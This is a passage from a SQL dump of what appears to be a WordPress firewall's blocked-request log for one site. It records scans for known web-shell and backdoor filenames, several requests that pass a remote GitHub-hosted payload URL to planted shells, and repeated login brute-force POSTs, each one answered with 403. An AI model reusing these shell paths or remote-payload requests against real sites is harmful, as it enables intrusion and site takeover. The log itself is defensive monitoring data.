Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yYdAFzPInmoJMVQufUxqiTjk',0,1665412433.1004,281,'','POST',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ayLdDcXjT9OhW7qCgIJ4vYse',0,1665412426.2813,293,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sWIdCylDthV4PKfYeRcqxJAQ',0,1665412424.7989,277,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0A3N7kbmvsMaGT95qxg8KteP',0,1665412416.4083,310,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6ZvV5FMpj7mNXPWdsJIYEQhB',0,1665412420.4487,322,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sXuSGJlxYZ0Ubd4T93pWaOhf',0,1665412414.9177,304,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','x0nR7CmPDVZA8QIXSaB2t4go',0,1665412411.7585,295,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jLcKGphmukH4OeXCUyAaJMw8',0,1665412409.6067,292,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OAHL25b7rQm1wFS0Es4lZDBY',0,1665412404.9809,281,'','GET',403,0,700,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5cfNr8WFmXdzhB6Y3nZLMEQl',0,1665412383.9870,5277,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5dWDAxP3rbiSX4GT7V96zoNC',0,1665412392.3774,287,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PqVFlrStdQs6evmEuiyzhbGo',0,1665412386.6332,979,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Q7oJXFqR9cD4rPKhm2vfTl8a',0,1665412383.1721,338,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vQX4WybaYIi0nV9mu3eotLUg',0,1665412381.3743,395,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7WR1ebothB46ILVGampJv9cz',0,1665412379.8906,352,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WM1gtxhbY738jRcvzFOUwDpi',0,1665412374.8418,470,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zMyHFOX8GakqD9JUsE2YdIfB',0,1665412370.2227,349,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5rD1JsI6oTnuc7RLxKZOePfv',0,1665412369.0763,378,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','94fsuOU0lRDq3CoE652hWkXm',0,1665412363.9559,290,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','njBCqkeGlaQFWNzP7XuiH9Em',0,1665412362.6216,471,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','S5UHFZk8GNEto3s74cbhPYxj',0,1665412356.4452,4921,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xtPBeZDQRdW5nlac0TNOSjq1',0,1665412352.0803,464,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uXT56IYrzZVlRU9aAdGJMxKj',0,1665412349.5852,303,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','d0tuy3cp2qBH8KMQWX6gboaf',0,1665412348.0673,288,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','g4dSEM0vfCLWBaKYGyDo1TlZ',0,1665412282.5590,308,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','r1Y2KIM0TNmfEnU8iqbGscB7',0,1665412281.4442,309,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Q9iG0qYAeTHEw7ubgp1BSnML',0,1665412277.6358,291,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5FlxPm7GHCz2dKJ1RgqQNsDX',0,1665412276.0866,412,'','GET',403,0,700,0,1,'',0),('96.47.229.59',1613751611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','c27zedjJACfaHm5E6OPVYGbZ',0,1665412112.3581,1399,'','POST',403,0,515,0,1,'',0),('157.230.38.184',2649106104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','My02SD35GlXJ61nPd9xAWbeq',0,1665411935.1329,1957,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jLVDkYdPGIraxhUcgf76AFEv',0,1665411071.5794,20629,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','jI7mMQoAH1aXYLg4GCi3ydpT',0,1665410715.8282,1371,'','POST',403,0,515,0,1,'',0),('154.6.22.36',2584090148,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BDmgZrKLv75ciHu4a9InlxAG',0,1665410631.6860,1378,'','POST',403,0,515,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/class-wordpress-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LGiUk5SHsVvZCnjemENOYAaK',0,1665416876.4101,293,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/class-detect-spam.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2VYMedlot6DR4F5Wb1sBrhgm',0,1665416875.1670,295,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kVFt7x5lQ4W9eLByJdYvCSg3',0,1665416873.8788,280,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1ACERo3l6Kv9bdNDWeFOq8tc',0,1665416872.5140,291,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','BI9H1gNmjV6SZiWFnua2tE85',0,1665416870.6914,310,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/system-reboot.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','UL7eqi5vjZGwszYp24SDPgKm',0,1665416869.3498,331,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/class-wordpress-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jcHWqBOldgvh9iDoRNL3kuzE',0,1665416868.1474,311,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/class-detect-spam.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kyzKR3GfEijnb965tdOqge27',0,1665416866.6531,307,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','r08zCxpWjo9dcBqAf42vPRMs',0,1665416865.3518,313,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','cuv7ZhdEkr1NXORfGpT4VSaF',0,1665416863.9031,338,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/plugins/core-engine/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','RgzL9wYQnBcfuEd71WJliVTt',0,1665416860.8929,310,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','wfIze6uVxSoBpMKr1iQcvW2g',0,1665416862.2811,299,'','GET',403,0,700,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BGhzQxkf0orJwv3ZRK5NcFue',0,1665416837.5703,18619,'','POST',403,0,515,0,1,'',0),('192.64.113.147',3225448851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5bn6oXiNMCzPwFx94uvBKA3h',0,1665416404.6537,20651,'','POST',403,0,515,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uQKnHjDRs6qoYAWJz25bwXUa',0,1665415943.1660,18951,'','POST',403,0,515,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kg4mGiRVZ1s6faIWtbKN3nq0',0,1665414607.5103,18242,'','POST',403,0,515,0,1,'',0),('45.119.213.225',762828257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nKRDImduX0lvNBiJ6eCkShfZ',0,1665415060.4046,18312,'','POST',403,0,515,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','R36o0fyiASuxkdFbUalhLCrH',0,1665414162.2926,18965,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','LaSgkhznclE2xNqGBYrMJFb5',0,1665418942.9253,18870,'','POST',403,0,515,0,1,'',0),('185.207.31.97',3117358945,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v2KW9SnBgO4QFJZE7Ryp5wCz',0,1665418109.5193,18531,'','POST',403,0,515,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','dPQsEb8zmMf6aN5UYXvn4LWt',0,1665424508.2344,17296,'','POST',403,0,600,0,1,'',0),('194.163.35.152',3265471384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','imZNETnPxRG0AtsUXSja6qwv',0,1665423922.8284,6263,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','zfm5BpTXvlc9AYFS7aj3QKHR',0,1665423494.3562,3077,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','2PNMA7tJyem1Udnk9I3gapsF',0,1665423120.8583,19144,'','POST',403,0,515,0,1,'',0),('35.187.58.136',599472776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','oMXO2petCqVj0ISHNRQfzrx9',0,1665422916.6071,1982,'','POST',403,0,600,0,1,'',0),('188.166.120.27',3165026331,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','VIyQZp6Sdaq9oBrXfFjcnu7h',0,1665422487.2327,18072,'','POST',403,0,600,0,1,'',0),('163.44.198.57',2737620537,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','yeczwfUQ6hF0G1dWqSVAtOxY',0,1665421455.4256,17754,'','POST',403,0,600,0,1,'',0),('185.2.4.56',3103917112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','AKnXsZLbxktCrP579NURpTyl',0,1665427926.0163,17570,'','POST',403,0,600,0,1,'',0),('89.238.166.235',1508812523,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fio0p76ZQdFkP5cTVYq9DJHE',0,1665428293.8103,19209,'','POST',403,0,515,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','I6ZC7di5zayXnvo4SwWD1r2M',0,1665427512.2673,17759,'','POST',403,0,600,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','2aWEs8HPvjr5Ag4o07kMzNpq',0,1665426519.1542,17362,'','POST',403,0,600,0,1,'',0),('178.162.212.214',2997015766,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OcjdNVJS5zmQCohYtgE6rq1i',0,1665426372.8143,18800,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iXNrxpaHw065ncGsUOSLDmIb',0,1665425957.0165,1643,'','POST',403,0,515,0,1,'',0),('85.191.40.94',1438591070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','lGoMAzWehgHC82Bd0pXtNikZ',0,1665425942.7850,1243,'','POST',403,0,600,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','M43FbjoOKQLlx8SRYp7sBt2u',0,1665424929.5496,2040,'','POST',403,0,600,0,1,'',0),('138.68.147.16',2319749904,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','pQIHqW5VdrAP28KtsTfmyZNn',0,1665431872.1572,1803,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','su34UpjfLSJqCztdK15RwlNy',0,1665431454.6763,17749,'','POST',403,0,600,0,1,'',0),('64.227.183.25',1088665369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','ZKyAD3eqxBJswuQ9gUOXn6vz',0,1665430889.8650,17578,'','POST',403,0,600,0,1,'',0),('111.231.200.129',1877461121,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','UIrxskien8OZvhB52jofVDtm',0,1665429903.4784,17520,'','POST',403,0,600,0,1,'',0),('208.113.153.214',3497105878,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','sduHvgk7OCMY621VNyBTiIpw',0,1665429478.1551,17699,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','lS4dnGe9N6g2AiIjMHTZxQE8',0,1665428912.0273,18543,'','POST',403,0,600,0,1,'',0),('64.42.179.67',1076540227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qkTAHur4gYzNoefn26Iv9xyK',0,1665428640.1623,19968,'','POST',403,0,515,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','zvhBAe7f4ojd9DitgE0V2MNp',0,1665428490.2633,1127,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','oUiVxLSQIB8Me6jqp9AGFTWg',0,1665435424.0808,2187,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','SVux0U2aE94YfvMyBzgkd6Ht',0,1665434432.9163,9570,'','POST',403,0,600,0,1,'',0),('207.46.234.202',3475958474,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','AeXONQxW08P4J9SgvrUdVafM',0,1665433867.7691,1895,'','POST',403,0,600,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','X3Etj4GHoUVbWR1aYCAfTOyI',0,1665433446.1521,1213,'','POST',403,0,600,0,1,'',0),('185.2.5.31',3103917343,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 